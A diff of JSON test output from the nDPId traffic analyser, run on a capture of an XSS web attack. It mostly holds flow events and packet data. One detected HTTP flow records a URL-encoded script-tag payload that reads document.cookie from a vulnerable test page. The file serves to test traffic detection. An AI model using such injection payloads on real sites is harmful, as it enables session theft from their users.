+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348061684,"flow_last_seen":1499348061684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1499348061684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348061684,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8R+ZAAD4GfeqsEAABwKgKMoroAFA+FlOsAAAAAKACchAsggAAAgQFtAQCCAoBPRRKAAAAAAEDAwc="}
@@ -3723,23 +3723,23 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1499348070791,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348070791,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jQtAAD4GOMWsEAABwKgKMotGAFAklpAkAAAAAKACchAARwAAAgQFtAQCCAoBPR0vAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":2,"flow_last_seen":1499348070791,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348070791,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi0aOH7cfJJaQJaAScSDJXAAAAgQFtAQCCAoD5u6jAT0dLwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":3,"flow_last_seen":1499348070792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348070792,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jQxAAD4GOMysEAABwKgKMotGAFAklpAljh+3IIAQAOVoZAAAAQEICgE9HS8D5u6j"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348071820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348072088,"flow_last_seen":1499348072088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348072088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1499348072088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348072088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DYZAAD4GuEqsEAABwKgKMotUAFAOsRP1AAAAAKACchCRCQAAAgQFtAQCCAoBPR5zAAAAAAEDAwc="}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":2,"flow_last_seen":1499348072088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348072088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi1Q00\/Q8DrET9qAScSB1CgAAAgQFtAQCCAoD5u\/nAT0ecwEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":3,"flow_last_seen":1499348072089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348072089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DYdAAD4GuFGsEAABwKgKMotUAFAOsRP2NNP0PYAQAOUUEgAAAQEICgE9HnMD5u\/n"}
-01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348068136,"flow_last_seen":1499348072090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499348072090,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27KGE8ES9SCQ7FORY5VSPTYY4R4UHJNRQTPTAY6L9JR1OU40RPDA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348068136,"flow_last_seen":1499348072090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499348072090,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27KGE8ES9SCQ7FORY5VSPTYY4R4UHJNRQTPTAY6L9JR1OU40RPDA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348073365,"flow_last_seen":1499348073365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348073365,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1499348073365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348073365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pg1AAD4Gh8OsEAABwKgKMotiAFCjeCG\/AAAAAKACchDtKgAAAgQFtAQCCAoBPR+yAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":2,"flow_last_seen":1499348073365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348073365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi2IT1M33o3ghwKAScSAXMQAAAgQFtAQCCAoD5vEmAT0fsgEDAwc="}
@@ -3760,15 +3760,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1499348081113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348081113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P1ZAAD4GhnqsEAABwKgKMouyAFAGWhgVAAAAAKACchCMEgAAAgQFtAQCCAoBPSdDAAAAAAEDAwc="}
